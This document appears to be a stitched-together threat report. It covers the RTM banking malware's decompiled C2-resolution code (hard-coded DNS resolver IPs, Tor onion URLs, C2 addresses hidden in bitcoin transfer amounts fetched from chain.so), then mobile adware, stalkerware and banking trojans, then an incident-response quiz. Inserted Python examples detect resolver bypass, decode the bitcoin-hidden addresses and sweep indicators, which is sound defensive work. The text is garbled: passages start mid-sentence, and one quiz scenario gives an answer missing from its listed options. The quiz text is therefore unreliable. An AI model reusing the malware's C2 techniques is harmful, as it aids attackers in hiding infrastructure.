      ip_dword = (*of_inet_addr)(ip_str);
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count = 1;
      name_p = LStrToPChar(ascii_cc_ptr);
      if ( !DnsQuery_A(name_p, DNS_TYPE_A, […], […], &pDnsRecord, […])
        && pDnsRecord && pDnsRecord->flag == 1 )
      {
        pr_index = GetIP_sub_411DCC(&pDnsRecord->int0, ip_addr, ip_addr, &savedregs);
      }
      if ( pDnsRecord && DnsRecordListFree )
        […]
      if ( pr_index )
        […]
      ip_str_1 = LStrToPChar(ascii->dns_ip_2);   // 91.217.137.37
      ip_dword = (*of_inet_addr)(ip_str_1);
      ip_str_2 = LStrToPChar(ascii->dns_ip_3);   // 188.165.200.156
      ip_dword_1 = (*of_inet_addr)(ip_str_2);
      ip_str_3 = LStrToPChar(ascii->dns_ip_4);   // 217.12.210.54
      ip_dword_2 = (*of_inet_addr)(ip_str_3);
      count = 3;
      counter = 60;
      do
      {
        pr_index = GetValue_sub_40672C() % count;
        pr_index_1 = GetValue_sub_40672C() % count;
        if ( pr_index_1 != pr_index )
        {
          dns_ip = *(&ip_dword + pr_index);
          *(&ip_dword + pr_index) = *(&ip_dword + pr_index_1);
          *(&ip_dword + pr_index_1) = dns_ip;
        }
        --counter;
      }
      while ( counter );
      name_ptr = LStrToPChar(ascii_cc_ptr);
      if ( !DnsQuery_A(name_ptr, DNS_TYPE_A, […], […], &pDnsRecord, […])
        && pDnsRecord && pDnsRecord->flag == 1 )
      {
        LOBYTE(pr_index) = 1;
        […]
      }
    }

The prototype of the DnsQuery_A function declared in the WinDNS.h header file:

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DNS_STATUS WINAPI DnsQuery_A(
        _In_                          PCSTR        pszName,
        _In_                          WORD         wType,
        _In_                          DWORD        Options,
        _Inout_opt_                   PVOID        pExtra,
        _Outptr_result_maybenull_     PDNS_RECORD  *ppQueryResults,
        _Outptr_opt_result_maybenull_ PVOID        *pReserved
    );
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The fourth argument supplied to the function is the address of the _IP4_ARRAY structure on the stack. The structure contains an array of the special DNS servers' IP addresses:

_IP4_ARRAY structure on the stack:

    -00000040 count
    -0000003C ip_dword
    -00000038 ip_dword_1
    -00000034 ip_dword_2

If the DnsQuery_A function is executed successfully, the IP address of the C2 server can be obtained by reading the following value:

    pDnsRecord->Data.A.IpAddress

The decompiled code of one of the samples shows that the special DNS server 188.165[.]200.156 is used to resolve the C2 domain name. In case this fails, a list of three DNS servers is used: 91.217[.]137.37, 188.165[.]200.156, 217.12[.]210.54.
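The direct queries to hard-coded resolvers described above leave a trace that an organisation's own DNS egress policy can catch. The following Python is an added example (not from the report) that scans constructed flow records for DNS traffic bypassing the approved resolvers and ranks hits against the three resolver addresses quoted in the decompiled code; the approved-resolver set, the record format and the flow lines are assumptions.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Assumed: the only resolvers that endpoints are permitted to query directly.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# The special DNS servers named in the decompiled RTM sample above.
RTM_RESOLVERS = {"188.165.200.156", "91.217.137.37", "217.12.210.54"}

# Constructed flow export (one key=value record per line, not real traffic).
SAMPLE_FLOWS = """\
ts=2019-06-10T09:00:01Z src=10.0.5.17 dst=10.0.0.53 proto=udp dport=53
ts=2019-06-10T09:00:02Z src=10.0.5.17 dst=188.165.200.156 proto=udp dport=53
ts=2019-06-10T09:00:02Z src=10.0.5.17 dst=91.217.137.37 proto=udp dport=53
ts=2019-06-10T09:00:03Z src=10.0.5.42 dst=8.8.8.8 proto=udp dport=53
ts=2019-06-10T09:00:04Z src=10.0.5.42 dst=10.0.1.53 proto=tcp dport=443
this line is malformed and must be ignored
"""


def parse_flow(line: str) -> Optional[Dict[str, str]]:
    """Parse one key=value record; return None for anything malformed so a
    bad line never aborts the scan."""
    fields: Dict[str, str] = {}
    for token in line.split():
        if "=" not in token:
            return None
        key, value = token.split("=", 1)
        fields[key] = value
    if not {"ts", "src", "dst", "proto", "dport"} <= set(fields):
        return None
    try:
        ipaddress.ip_address(fields["src"])
        ipaddress.ip_address(fields["dst"])
    except ValueError:
        return None
    return fields


def find_resolver_bypass(flow_text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map each internal source to the non-approved resolvers it sent DNS to,
    with 'high' severity for the resolvers hard-coded in the RTM sample and
    'medium' for any other resolver outside the approved set."""
    findings: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for line in flow_text.splitlines():
        flow = parse_flow(line)
        if flow is None or flow["dport"] != "53":
            continue
        if flow["dst"] in APPROVED_RESOLVERS:
            continue
        severity = "high" if flow["dst"] in RTM_RESOLVERS else "medium"
        findings[flow["src"]].append((flow["dst"], severity))
    return dict(findings)


def hosts_to_triage(flow_text: str) -> List[str]:
    """Sources with at least one 'high' finding: hosts whose DNS pattern
    matches the sample's resolver list and deserve a look first."""
    report = find_resolver_bypass(flow_text)
    return sorted(src for src, hits in report.items()
                  if any(sev == "high" for _, sev in hits))
```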


2019: Tor

On 15 February 2019, we discovered the first RTM samples with a C2 server located in the Tor network ([…]).

C2 server address in the Tor network among the decrypted strings. The data was obtained during the malware's execution:

    offset aHttp5aaw3unbkm ; "http://5aaw3unbkm5jqx7d.onion/index.php"
    offset aBotnetPrefix   ; "botnet-prefix"
    offset aBotnetId       ; "botnet-id"
    offset […]             ; "[…]interval"
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The section of the disassembled code where the C2 server URL is parsed:

    lea     eax, [ebp+lpUrlComponents]
    push    eax
    push    0
    lea     eax, [ebp+Url]
    mov     edx, [ebp+pwszUrl]
    call    WStrFromPWCharLen ; pwszUrl="http://w762icwux5m5p2mg.onion/index.php"
    mov     eax, […]
    call    WStrLen
    push    eax               ; dwUrlLength=0x27
    mov     eax, [ebp+pwszUrl]
    push    eax               ; pwszUrl="http://w762icwux5m5p2mg.onion/index.php"
    mov     eax, ds:WinHttpCrackUrl
    mov     eax, [eax]
    call    eax               ; WinHttpCrackUrl
    mov     […], eax
    test    […]
    […]     short loc_40DF2C


These samples were distributed until April 9, 
2019, after which RTM switched back to using 
the domain. 


Since 2019: bitcoin 


On 10 June 2019, we discovered an RTM 
sample that receives IP addresses of the C2 
servers from transactions to a specific wallet. 


As before, RTM generates two IP addresses. 
Each address is hidden in the number of 
bitcoins transferred during two consecutive 
transactions. 


To obtain the IP addresses of the C2 servers, the malware sends a request to https://chain[.]so/api/v2/get_tx_received/BTC/<wallet>. The response contains the set of transactions to the crypto wallet account:
    {
      "status": "success",
      "data": {
        "network": "BTC",
        "address": "bc1qh96q46mw72shp2j39uq3z00wh0gezguvk9qq5js",
        "txs": [
          {
            "txid": "…",
            "output_no": …,
            "script_asm": "0 b9740aeb6ef2a170aa512f01113dd77a32247196",
            "script_hex": "0014b9740aeb6ef2a170aa512f01113dd77a32247196",
            "value": "0.00003242",
            "confirmations": …,
            "time": …
          },
          … further transactions to the same output script; the amounts legible in the listing are 0.00023643, 0.00014728, 0.00055637 and 0.00040030 (the listing is two-column and their exact order is not recoverable) …
          {
            "txid": "…",
            "output_no": …,
            "script_asm": "0 b9740aeb6ef2a170aa512f01113dd77a32247196",
            "script_hex": "0014b9740aeb6ef2a170aa512f01113dd77a32247196",
            "value": "0.00008483",
            "confirmations": …,
            "time": 1560187837
          }
        ]
      }
    }

Transaction ids fully legible in the listing: 6c06482d309bbefa28cfb9a944bf975921cf7774d08371933769f3c85a9681dc, 8f9ee9295a1c5792eac69f1013933d43dbb9c99d883713a1dd0f3073f06db5c1, ccf403b8190a55676967100eb96694bae9a8e8ba852cbb1add4e81079cc993bc; the others are only partially legible.

We will look at how RTM extracts the C2 IP 
address from two transactions at the end 
(their BTC amounts are highlighted above). 


The code section showing the process of getting C2 IP addresses from a bitcoin transaction:

    LStrClr(ip_address);
    LStrClr(v3);
    WStrCat3(&address, wide->api_v2_get_tx_received_BTC, bitcoin_wallet);// /api/v2/get_tx_received/BTC/<wallet>
    res = HttpRequest_sub_6FD7EC(wide->chain_so, address, 0, 9, 443, 2, 96, 8, &DataStruct) != 0;// chain.so
    if ( res )
    {
      res = 0;
      LStrClr(ip_address);
      LStrClr(v3);
      LStrFromPCharLen(&ptrJsonData, DataPtr, DataStruct);
      Sysutils::LowerCase(ptrJsonData, &ptrLcJsonData);
      LStrLAsg(&ptrJsonData, ptrLcJsonData);
      if ( FindValue_sub_701714(&value_0, 0, &savedregs) && FindValue_sub_701714(&value_1, 0, &savedregs) )
      {
        IntToString(value_1);
        octet = SHR_8_sub_6F6464(value_1);
        IntToString(octet);
        IntToString(value_0);
        v8 = SHR_8_sub_6F6464(value_0);
        IntToString(v8);
        LStrCatN(ip_address, 7);
        LOBYTE(res) = 1;
      }
    }

A second, partial listing of the same routine appears in the report with different temporaries:

    …
    FindValue_sub_701714(&value_0, res, &savedregs) && FindValue_sub_701714(&value_1, res, &savedregs)
    IntToString(value_1);
    v9 = SHR_8_sub_6F6464(value_1);
    IntToString(v9);
    IntToString(value_0);
    v10 = SHR_8_sub_6F6464(value_0);
    IntToString(v10);
    v12 = v16;
    LStrCatN(v3, 7);
    …

The FindValue function searches for the fractional part of the transfer amount. The search starts from the buffer end. Each time the function is called, data is processed starting from the current index. In our case, successive calls to the FindValue function will yield the values 8483, 40030, 14728, and so on.

Disassembled code for getting an IP address from the amount of transfers to the crypto wallet:

    mov     eax, ptr [ebp+value_1]
    lea     edx, [ebp+…]
    call    IntToString
    push    [ebp+…]
    push    offset […]          ; "."
    mov     eax, ptr [ebp+value_1]
    call    SHR_8_sub_6F6464
    lea     edx, [ebp+var_28]
    call    IntToString
    push    [ebp+var_28]
    push    offset […]          ; "."
    …
    mov     eax, ptr [ebp+value_0]
    lea     edx, [ebp+var_2C]
    call    IntToString
    push    [ebp+var_2C]
    push    offset […]          ; "."
    mov     eax, ptr [ebp+value_0]   ; has value_0
    call    SHR_8_sub_6F6464
    lea     edx, [ebp+var_30]
    call    IntToString
    push    [ebp+var_30]
    call    LStrCatN
The code above works as follows:

    ip_address = str(value_1 & 0xff) + "." + str(value_1 >> 0x8) + "."
               + str(value_0 & 0xff) + "." + str(value_0 >> 0x8)





This means that by transferring 0.00040030 BTC and then 0.00008483 BTC, the attackers hid the IP address […] for the malware to find.


Similarly, RTM obtains the second IP address 
of the C2 server from the two previous 
transactions. 


This mechanism is still used in the RTM 
samples distributed at the time of this writing. 
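Putting the formula above into working code, as an added example that is neither the report's nor the malware's code: it takes a response in the shape of the chain.so API answer shown earlier (constructed here, with placeholder wallet and transaction ids; the order of the two earlier amounts is an assumption) and decodes one IP address per pair of amounts, newest pair first, so the last two transfers (0.00040030 and 0.00008483 BTC) give the address the text describes and the pair before them gives the second C2 address. The mapping of the most recent amount to value_0 follows the call order in the decompiled listing. Unlike the malware, which scans the raw JSON buffer from the end, the example reads the parsed value field, and it refuses any amount above 65535 in the fractional part, since such an amount cannot encode two octets.

```python
"""Decode C2 addresses hidden in bitcoin transfer amounts (RTM-style).

Added example, not the report's or the malware's code. It re-implements the
formula the report gives for the IP address and applies it to a response in
the shape of chain.so's get_tx_received API.
"""
import json
from typing import List

# Constructed response in the shape of the API answer shown in the report.
# The wallet address and txids are placeholders. The last two amounts are the
# ones the report discusses (0.00040030 and 0.00008483 BTC); the first two
# also appear in the report's listing but their order here is assumed.
SAMPLE_RESPONSE = json.dumps({
    "status": "success",
    "data": {
        "network": "BTC",
        "address": "bc1q-placeholder-wallet",
        "txs": [
            {"txid": "txid-placeholder-1", "value": "0.00055637"},
            {"txid": "txid-placeholder-2", "value": "0.00014728"},
            {"txid": "txid-placeholder-3", "value": "0.00040030"},
            {"txid": "txid-placeholder-4", "value": "0.00008483"},
        ],
    },
})


def fractional_satoshis(value: str) -> int:
    """Return the fractional part of a BTC amount as an integer: "0.00040030" -> 40030.

    This is what the malware's FindValue routine extracts from the raw JSON
    text; here the value comes from the parsed field instead of a buffer scan.
    """
    _whole, _dot, frac = value.partition(".")
    frac = (frac + "00000000")[:8]          # normalise to 8 decimal places
    return int(frac)


def amounts_from_end(response_text: str) -> List[int]:
    """Amounts of all transactions to the wallet, most recent first.

    The malware scans the response from the end, so the last transaction
    becomes value_0 and the one before it value_1.
    """
    data = json.loads(response_text)
    return [fractional_satoshis(tx["value"]) for tx in reversed(data["data"]["txs"])]


def decode_ip(value_0: int, value_1: int) -> str:
    """Apply the report's formula: each amount carries two octets (low byte, high byte)."""
    if not (0 <= value_0 < 65536 and 0 <= value_1 < 65536):
        # More than two bytes cannot be an octet pair; refuse rather than
        # emit a bogus address such as 12.300.0.1.
        raise ValueError("amount does not encode two octets")
    return f"{value_1 & 0xff}.{value_1 >> 8}.{value_0 & 0xff}.{value_0 >> 8}"


def c2_addresses(response_text: str) -> List[str]:
    """Decode every consecutive pair of amounts, newest pair first."""
    vals = amounts_from_end(response_text)
    return [decode_ip(vals[i], vals[i + 1]) for i in range(0, len(vals) - 1, 2)]


if __name__ == "__main__":
    print(c2_addresses(SAMPLE_RESPONSE))
```

Run against a captured response for the real wallet, the same function enumerates every address the attackers have published so far, which is what an analyst needs to populate blocklists and to retro-hunt proxy and firewall logs for past beaconing.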
When speaking about attacks on individuals in the context of cybersecurity, we usually mean compromised mobile devices. More specifically, Android devices, which are the most common personal devices used to access the Internet.
Over the past 18 months, we have seen positive results of the mobile malware prevention efforts. Cases of money being stolen from victims through malicious apps have decreased.
developers who make money off adware or tracking the digital behaviour of users. Their monetisation models are part of a legal sector of the economy; still, this does not make their apps less dangerous.

Nevertheless, it is much too early to speak about a complete defeat of conventional cybercrime. A year ago, we noted some new techniques used by a number of banking malware families. Today, it seems this may spark a large-scale evolution of malware which will either lead to new cyber epidemics or to increased destructive effects of each individual attack.
2. Operating system market share worldwide // Statcounter Global Stats.
At the end of 2019, the overall activity of mobile malware reduced considerably. According to one estimate, the number of mobile malware application packages dropped by a third (34%) […]. The number of targeted attacks against users also decreased by 31%.³

One of the causes of this decline is the end of the Asacub family outbreak. Asacub was a conventional banking trojan posing a threat to the banking sphere as far back as 2018 (more details below, in the section 'Banking trojans:

An application package is a […] needs to perform its functions. […] the operating system installs and configures the application on the device by itself. Android uses the APK format for application packages.
app activity and mobile ransomware incidence is at least in part responsible for the overall dip

vulnerabilities that often tend to be exploited by hackers. For instance, Android 10, released in September 2019, came with updates that limit apps from running processes and accessing location in the background.⁴ Android 11, which is yet to be released as of writing this report, is expected to have changes regarding permissions. Specifically, users will have the option of granting an application one-time access to their data.⁵
3. Mobile malware evolution 2019 // Securelist.
4. Privacy changes in Android 10 // Android Developers.
5. Permissions updates in Android 11 // Android Developers.
Secondly, Google keeps toughening its control over applications in the Google Play store. For example, the company has included outside partners in the moderation of software submitted to the store. Last November, Google announced a partnership with antivirus software developer ESET, as well as with Lookout and Zimperium, both companies specialising in mobile security. Under the framework of the newly-formed App Defense Alliance, Google's own Play Protect works alongside external malware detection systems.⁶
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Despite the recent progress in mobile malware protection, 
it is still too early to disregard these threats completely. 
In the previous chapter ('Attacks on organisations') we discussed how adware spilled into corporate networks en masse, after which it was no longer regarded as a threat exclusive to individuals.
Yet, this does not mean that adware developers have forgotten about their former market. In 2019, there was a relative surge in this type of mobile malware, which is known to primarily affect individual users.

The number of adware application packages has almost doubled over the last year: according to one estimate, their number increased by 74% in 2019, compared to 2018. Recent observations reveal that 4 out of 10 families of malware which are most frequently used to attack mobile devices were found to be adware.
attention than it deserves due to its seemingly harmless nature. But, in actual fact, this software has all the technical capabilities to start standard malware attacks.
Adware's main objective is merely force-feeding the user ads and thus driving up the number of ad views which, in turn, brings in more money from advertisers. However, this is implemented by installing additional modules which can potentially perform any other actions without a user's knowledge, like stealing their data.

Adware can also pass the sniff test of app store moderators simply because the line between such malware and legitimate applications which use advertising in their business model is very thin.
text recognition app, is a good example. For some period, it was monetised only by means of ads and premium subscriptions. However, in summer 2019, cybersecurity specialists discovered a malicious component in the app's file which downloaded additional modules without the knowledge of users. In this particular case, the additional modules had adware functions. As a result, Google deleted the app from its official store.¹⁰ ¹¹


9. Mobile malware evolution 2019 // Securelist. 
Soon after this incident was made public, developers of CamScanner claimed that the malicious code had been part of the advertising SDK which they successfully removed. Following this, the application returned to Google Play Store.¹²


The reason adware requires special attention, as mentioned earlier, is because of the tricks used by its developers to ensure functioning. This can be showcased by the example of adware symbolically dubbed by researchers as 'Agent Smith'. With the help of a legitimate app, Agent Smith infiltrates a device, but it does not stop there: its malicious component modifies other applications in the system to display advertising. By the time cybersecurity specialists discovered Agent Smith, it had already infected 25 million devices.¹³









12. Detail // CamScanner. 
SDK (Software Development Kit) is a set of different tools which helps developers to integrate third-party features.

Usually such features are related to the platform for which the app is being developed, such as an operating system, social network, a game console, etc. In these cases, the SDK is developed by the owner of the platform.

Such a platform may also be an advertising network, the middleman between the advertiser and the app owner providing banner or video slots. If an advertising network has its own SDK, application developers are confined to using it if they want to serve ads and make a profit.

An SDK is integrated into software, making the software execute third-party code. Therefore, the security of end users depends not only on the app developer, but also on the SDK owner.
Stalkerware: a bug in your pocket

2019 also saw the surge of stalkerware. That year the number of its victims grew by 67%, compared to 2018.

Stalkerware is essentially spyware, but it only differs in the scope of functionality and the method of monetisation.

Unlike regular spyware, stalkerware is openly sold as a tool for spying on family members.

When criminals use conventional spyware, they rarely concern themselves with the victim's data, but rather look for ways to access their finances, […] banking credentials or other personal data useful for social engineering.

Stalkerware, on the other hand, is developed with the express purpose of gathering the victim's sensitive data and passing it on to a third party. With this class of malware, the third party is often not some anonymous darknet customer who likes to collect large datasets, but a person who personally knows the victim. Stalkerware developers sell it as a tool for spying on spouses, partners or children.¹⁴ ¹⁵


14. Mobile malware evolution 2019 // Securelist.
15. […] // Kaspersky Daily.





Stalker applications can be divided into two types.

The first type includes trackers with relatively simple functionality which only collects and transfers the victim's coordinates and SMS chats. Such applications used to be widely available in Google Play Store until February 2018 when Google banned tracking software on its platform. Since then, the number of trackers in Google's official store has reduced considerably, and their developers have stopped supporting such applications.

The second type includes more advanced apps. These can collect almost all data on the device: photos, calls, messages, location data, etc. Such software is being actively developed to this day and often distributed directly via the developers' websites.


Stalkerware of the second type exploits vulnerabilities related to device administrator privileges and the accessibility service. This allows messages with default protection to be captured from social media and mobile messengers. When this is impossible, they simply take screenshots, record keystrokes or copy texts from input fields.¹⁶
stalkerware victims¹⁶

compared to the year before that, while the monthly number of attacks […] 2018 levels. This result can largely be attributed to the reduction of Asacub activity, the malware responsible for 44% of all attacks using such trojans. Between March and April 2019, the number of victims of Asacub decreased by almost 2.5 times; and between April and May 2019, this number fell by a further factor of three. Over the last few months, the average number of attacked users amounted to 23.6 thousand, which is just a quarter of the peak seen in March 2019.¹⁷

decrease of fraudulent transactions through SMS commands in Russia since last year
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Another reason for the last year’s reduction 
of the banking trojans’ activity could be their 
general obsolescence. 
Malware of this class usually attacks either by capturing commands used by SMS banking or by exposing the victim to phishing windows which pretend to be legitimate payment forms. An example of the second method is demonstrated by the Faketoken family, which was used in a large-scale attack this February.¹⁸

When a legitimate application is opened (e.g. a taxi app, as shown in the screenshot), the malware displays a notification that urges the user to enter payment details under a contrived pretext […]. In this case, hackers expect the distracted users to mistake the notification window and the input form for genuine components of the taxi service application.

Text of the phishing window in the screenshot:

    Error
    Failed to confirm your location
    […]
    checking

    Attention
    Dear user, due to increasing frauds and malusage of internal functions of the VISA service application, we are forced to introduce a new requirement for all our users. Please enter the details of your debit/credit card for one-time verification of your identity. Within 24 hours, an amount equal to 1 RUB will be withdrawn from your card and then returned.

    Where are you going?
SMS banking with banks urging clients to use applications even for simple transaction notifications. As a result, over the previous year, in Russia, the number of fraudulent transactions made through SMS banking was reduced by 62%, compared to 2018. Hence incidents involving money theft using SMS commands fell to 12%.
The second method is also gradually losing traction. It requires attackers to use their own devices to access a victim's bank account and transfer the money out of it. Unlike the transfers using smartphones, such operations raise enough suspicion to be detected and blocked by fraud prevention systems. Therefore, phishing forms have been gradually losing their attractiveness.

Cybercriminals continue to develop new and more destructive techniques.


In Threat Zone 2019, we discussed how some banking trojans control infected devices through the Android accessibility service. This service allows malware to fill out forms and press buttons in other apps without the knowledge of the user. In these cases, money is stolen using SMS banking or, in some extreme cases, via the user's personal application account. Recently, this activity has been on the rise.

In spring 2019, cybersecurity specialists spoke about a banking trojan called Gustuff. Gustuff targets 132 different financial apps, 100 of them being apps of different banks in various countries and 32 of them being cryptocurrency wallets.


The way this malware works is similar to that of PC banking trojans, such as Buhtrap and RTM, that manipulate accounting software to spoof payment orders. Using the accessibility service, Gustuff presses buttons and fills out financial forms so that the money is transferred to the hackers' accounts.¹⁹ ²⁰

If hackers need authentication data, Gustuff displays a fake notification urging the user to update the payment details (indicating that Google Play requires it) and then waits for the user to enter the data to be captured.²¹

Despite its impressive functionality, Gustuff has not yet reached even the top ten of the most frequently encountered banking trojans.²² However, this malware can be considered a powerful one, just as the rest of the subgroup of mobile banking malware which uses the accessibility service. It is not unlikely that they will prompt a new avalanche of banking trojan activity this year or later on.


19. Mobile malware evolution 2019 // Securelist. 
A single mistake in cyber threat response could outweigh any advantage you had over the attackers. This may cause irreparable damage and make further investigation impossible. The matter is complicated by the fact that the decisions to be made are not always obvious.

We have compiled a small quiz based on typical situations […].

What would you do in these situations? Answer these 9 questions to check your knowledge and incident response skills.
Malware has been detected on several computers in your organisation. Analysis shows that the malware is used by a group that encrypts data and then demands ransom for decryption.

What do you do first?

1. Disconnect the company's infrastructure from the Internet
2. Launch a company-wide antivirus scan
3. Isolate the domain controller(s) from the corporate network
4. Physically turn off users' computers
Answer: 3. Isolate the domain controller(s) from the corporate network

If the attacker gains the possibility of encrypting data in all systems of your network, the most efficient solution is to isolate or turn off the domain controller.

Attackers often use group policies and tools like PsExec and WMI to spread their ransomware within the network and launch it automatically. These tools usually require a running domain controller since it is responsible for authentication in other systems, which the attackers need to launch the malware. If you turn off the domain controller, hackers will not be able to execute commands on remote computers as easily.

Once you have your domain controller turned off, you can search for the malware and delete it, find compromised accounts, etc.

Disconnecting the entire infrastructure from the Internet may not be as efficient at this stage since it is unknown yet whether the encryption has begun or not. Isolation may be the next step of the response process.
An unknown person contacted you and reported a critical vulnerability in your infrastructure/services which anyone can exploit to access clients' data. The anonymous person is willing to describe the vulnerability for a small consideration and shows some real users' logins and passwords as proof.

What do you do?

1. I will pay for the information about the vulnerability
2. I will ask a company that provides penetration testing services to confirm the vulnerability
3. I will report the incident to law enforcement authorities
4. I will try to find out if there is another way to obtain the data
Answer: 4. I will try to find out if there is another way to obtain the data
Attackers often use information obtained as a result of leaks from one site or service (login and password databases) to extort money from the owners of another. They do it by checking if the leaked data was used in other services and then contact the owners of these services about a purportedly discovered vulnerability. In fact, there is no vulnerability, other than the possibility to quickly guess legitimate user credentials with brute force methods (this is called […]).

Approaching a company that provides penetration test services is a good idea but should be done at a later stage when you know what kind of vulnerability to look for. It is too early to contact law enforcement authorities at this stage as well.

In our practice, we have often encountered cases when companies paid for the information about vulnerabilities without having properly investigated all circumstances. Once the money was paid, the mysterious friend just disappeared.
You suspect that one of your employees is stealing information and decide to gather evidence from their work PC for potential investigation.

What do you do first?

1. Isolate the PC from the company's network
2. Seal off the computer case and put it into a safe until all circumstances have been cleared up
3. Image the system's RAM
4. Image the HDD
First of all, you need to get an image of the system's RAM. This will back you up if the attackers use encryption tools like crypto containers (VeraCrypt, etc.) to hide the stolen information. Encryption keys are stored in RAM; in case the computer is turned off, they will be irretrievably lost together with access to data.

When the RAM image is ready, you can proceed to making a forensic image of the hard drive.
You come across a critical vulnerability in the infrastructure. Exploiting this vulnerability will give attackers full access to all systems of the company.

1. Change all passwords to all accounts in the domain as soon as possible
2. Thoroughly investigate the vulnerable systems since attackers may have already exploited the vulnerability
3. Patch the vulnerability without informing anyone
4. Install a backdoor on the company's domain controller in case the employees don't cooperate during response

In this case, you need first to conduct a detailed analysis of the vulnerable systems. This will allow you to find out if there are any signs of somebody exploiting the discovered vulnerability. Based on the results of the analysis, you can proceed to further steps, e.g. configuring the process of monitoring the infrastructure or changing passwords.
An employee of the company receives an email with a suspicious attachment and forwards it to a member of the cybersecurity team, just to be safe.

What should the member do with the email?

1. Open the attachment to make sure it is malicious
2. Analyze the email using dynamic analysis tools or services of another company
3. Scan the attachment with antivirus software and send the results to the employee who had received the email
4. Discipline the employee for sending emails with malicious attachments
Answer: 2. Analyze the email using dynamic analysis tools or services of another company
The correct option is to analyse the letter. This is the only way to confirm whether the attachment is malicious or not. If the company has its own experts in malware analysis, great. If you do not have such specialists, you can use an automated sandbox service, a Threat Intelligence Platform or services of a third-party company.

A mere antivirus scan will not be enough. Before starting a phishing campaign, cybercriminals make sure that malicious email attachments do not get detected by any antivirus. Dynamic analysis tools, alongside information from Threat Intelligence, can detect such threats much more effectively.

We have seen numerous cases where malicious attachments were opened by employees responsible for cybersecurity. There were even cases of a CISO
A few months ago, there was a serious incident in your company: the adversary had full access to the entire infrastructure for two weeks. The incident was contained and eradicated. Now, antivirus software detects suspicious executable files used by the same cybercriminal group on servers in the internal network.

What should you do in this case?

2. Check these systems with another antivirus to exclude a false positive
3. Check all systems for the indicators of compromise discovered during the previous incident
4. Clear antivirus logs: these must be the files that have remained in the systems since the previous incident
The best option is to disconnect the company's infrastructure from the Internet. It is likely that the company's entire network has already been compromised: malware detected on servers is one of the most visible signs of attacker activity.

At this point, isolating only the servers where malware was detected will not be effective.

If you face a similar situation, cut off the attackers' access to the network first and only then proceed to a step-by-step analysis of their activity.
You are contacted by experts from a well-known cybersecurity firm. They inform you that dangerous malware used by the Carbanak group has been detected in your network. However, your employees have already scanned the suspicious systems with an antivirus and deleted all detected files.

What should you do?

1. Check the systems with an antivirus once again to ensure that the malware was deleted
2. Clarify the list of infected systems and isolate them from the network
3. Submit the discovered malware samples to experts from the cybersecurity company
4. Disconnect the company's network from the Internet

Correct answer: 2. Clarify the list of infected systems and isolate them from the network
The right option is to ask the firm's representatives to provide you with a list of the infected systems. You should isolate those systems from the network and then conduct a detailed analysis of them, taking into account the information about the attackers' tactics, techniques and procedures (TTPs). An antivirus scan removes the files it recognises, but not the attackers' other footholds, and it destroys the samples an analyst needs.

In our experience, companies often ignore such reports from cybersecurity specialists, thinking that an antivirus check is enough. Due to the lack of response procedures, adversaries achieve their goals while companies suffer financial losses.
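Both of the last two scenarios come down to the same action: take the indicators known from the incident (or supplied by the external firm), sweep every system for them, and isolate what matches. Below is an added example of that sweep; it is not code from the BI.ZONE report, and the host names, telemetry lines and indicator values are constructed (the hashes, domains and the 203.0.113.45 documentation address are placeholders, not real Carbanak indicators). The point it makes is the one the Carbanak scenario turns on: `srv-fin-02` no longer has the malicious file, because the antivirus deleted it, yet it still resolves the C2 domain and connects to the C2 address, so it belongs on the isolation list.

```python
"""IOC sweep over host telemetry and derivation of the isolation list
(added example, constructed data)."""
import hashlib
from collections import defaultdict

# Constructed indicators "discovered during the recent incident".
IOCS = {
    "sha256": {hashlib.sha256(b"constructed-dropper").hexdigest()},
    "domain": {"update-svc.example", "cdn-metrics.example"},
    "ip": {"203.0.113.45"},            # TEST-NET-3 address, documentation only
    "path": {r"c:\programdata\svchost32.exe"},
}

DROPPER_HASH = next(iter(IOCS["sha256"]))
LEGIT_HASH = hashlib.sha256(b"constructed-legit-binary").hexdigest()

# Constructed telemetry in a simplified "<host> <type> <fields...>" format:
# FILE <path> <sha256>, DNS <queried name>, NET <dst ip>:<port>.
TELEMETRY = f"""\
srv-fin-01 FILE C:\\ProgramData\\svchost32.exe {DROPPER_HASH}
srv-fin-01 DNS update-svc.example
srv-fin-02 FILE C:\\Windows\\System32\\svchost.exe {LEGIT_HASH}
srv-fin-02 DNS cdn-metrics.example
srv-fin-02 NET 203.0.113.45:443
srv-hr-01 FILE C:\\Windows\\System32\\svchost.exe {LEGIT_HASH}
srv-hr-01 DNS www.example.org
ws-acct-07 NET 203.0.113.45:8443
"""


def parse_line(line: str):
    """Return (host, KIND, rest) or None for blank or malformed lines."""
    parts = line.split(maxsplit=2)
    if len(parts) < 3:
        return None
    host, kind, rest = parts
    return host, kind.upper(), rest


def sweep(telemetry: str, iocs: dict) -> dict:
    """Map host -> sorted list of 'class:value' indicator matches."""
    hits = defaultdict(set)
    for line in telemetry.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        host, kind, rest = parsed
        if kind == "FILE":
            path, _, digest = rest.rpartition(" ")
            if digest.lower() in iocs["sha256"]:
                hits[host].add("sha256:" + digest.lower())
            if path.lower() in iocs["path"]:          # Windows paths: case-insensitive
                hits[host].add("path:" + path.lower())
        elif kind == "DNS":
            if rest.lower() in iocs["domain"]:
                hits[host].add("domain:" + rest.lower())
        elif kind == "NET":
            ip = rest.rsplit(":", 1)[0]
            if ip in iocs["ip"]:
                hits[host].add("ip:" + ip)
    return {h: sorted(v) for h, v in hits.items()}


def isolation_list(hits: dict) -> list:
    """Hosts to cut off from the network, most indicator classes first."""
    return sorted(hits, key=lambda h: (-len(hits[h]), h))


if __name__ == "__main__":
    matches = sweep(TELEMETRY, IOCS)
    for host in isolation_list(matches):
        print(host, matches[host])
```

Isolation (blocking the host at the switch, firewall or EDR agent) is what the sweep feeds; eradication comes later, after the isolated hosts have been imaged and the attackers' TTPs mapped, which is why deleting detected files first is the wrong order.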
They contain a link to a fake Outlook Web Access page. Analysis of the email headers confirms that the messages are sent from your mail server.

What should you do?

1. Image the data storage and RAM of the mail server
2. Perform a mass check of all network systems for unauthorised access
3. Check the employee's email account for the same phishing messages
4. Perform an antivirus scan of the employee's PC
Correct answer: 3. Check the employee's email account for the same phishing messages
First of all, you should check the inbox of the user whose account the phishing messages were sent from, to find out whether there are similar messages there.

